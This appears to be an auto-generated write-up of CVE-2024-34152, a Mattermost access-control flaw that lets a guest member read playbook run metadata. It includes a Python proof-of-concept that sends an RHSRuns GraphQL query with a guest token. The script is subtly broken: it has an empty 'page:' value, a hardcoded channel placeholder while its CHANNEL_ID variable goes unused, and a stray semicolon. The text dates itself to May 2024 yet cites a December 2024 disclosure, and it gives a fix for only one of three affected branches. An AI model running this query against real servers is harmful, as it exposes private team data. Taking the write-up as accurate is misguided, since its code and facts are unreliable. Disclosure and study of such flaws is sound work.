CVE-2024-34152: Uncovering the Access Control Vulnerability in Mattermost Versions 9.5.x, 9.6.x, and 8.1.x

A critical vulnerability, identified as CVE-2024-34152, was recently discovered in Mattermost software, impacting specific versions 9.5.x <= 9.5.3, 9.6.x <= 9.6.1, and 8.1.x <= 8.1.12. This vulnerability is due to inadequate access control measures that allow a guest member to access the metadata of a public playbook run linked to the channel. This happens when the guest member sends an RHSRuns GraphQL query request to the Mattermost server, potentially compromising sensitive team information.

In the following sections, we will dive into the details of this vulnerability, its implications, a code snippet that reproduces the issue, and possible mitigation measures.

Details of the CVE-2024-34152 Vulnerability

The CVE-2024-34152 vulnerability arises due to Mattermost's failure in executing proper access controls, resulting in unauthorized access to data that should be restricted to a specific user or team.

Mattermost 8.1.x (<= 8.1.12)

Here's a code snippet that allows a guest member to send a GraphQL RHSRuns query request to the Mattermost server:

import requests

# Replace these with your Mattermost server URL, channel ID, and guest access token
MATTERMOST_SERVER_URL = "https://your-mattermost-server-url.com";
CHANNEL_ID = "abc123"
GUEST_ACCESS_TOKEN = "your_guest_access_token"

query = """
query {
  rhsRuns (
    channelId: "your_channel_id",
    searchTerm: "",
    type: "all",
    page: ,
    perPage: 10
  ) {
    totalCount,
    pageInfo {
      startCursor,
      endCursor,
      hasNextPage,
      hasPreviousPage
    },
    nodes {
      id,
      title,
    }
  }
}
"""

url = f"{MATTERMOST_SERVER_URL}/api/v4/graphql"
headers = {
    "authorization": f"Bearer {GUEST_ACCESS_TOKEN}",
    "content-type": "application/json",
}
data = {"query": query}

response = requests.post(url,headers=headers,json=data)
print(response.json())

By running the above code snippet, it is possible to reveal the metadata of a playbook run that is linked to a channel the guest user is part of, thus exposing sensitive information.

Original References

- https://mattermost.com/blog/coordinated-disclosure-of-security-vulnerability-2024-12-03/
- https://github.com/mattermost/mattermost-server/security/advisories/GHSA-j995-w937-th9w

Mitigation Measures

To remediate this issue, Mattermost recommends upgrading to the following patched versions with proper access controls in place:

Mattermost 8.1.13

Additionally, administrators should review their guest member permissions and channel settings to ensure that only authorized personnel have the appropriate access.

Conclusion

This CVE-2024-34152 vulnerability in Mattermost opens the door for unauthorized access and sharing of sensitive data among guest users. By promptly upgrading the affected software, administrators can effectively secure their team channels and playbooks. Moreover, a periodic review of user permissions and access controls is essential to avoid similar vulnerabilities in the future.

Timeline

Published on: 05/26/2024 14:15:09 UTC
Last modified on: 05/28/2024 12:39:28 UTC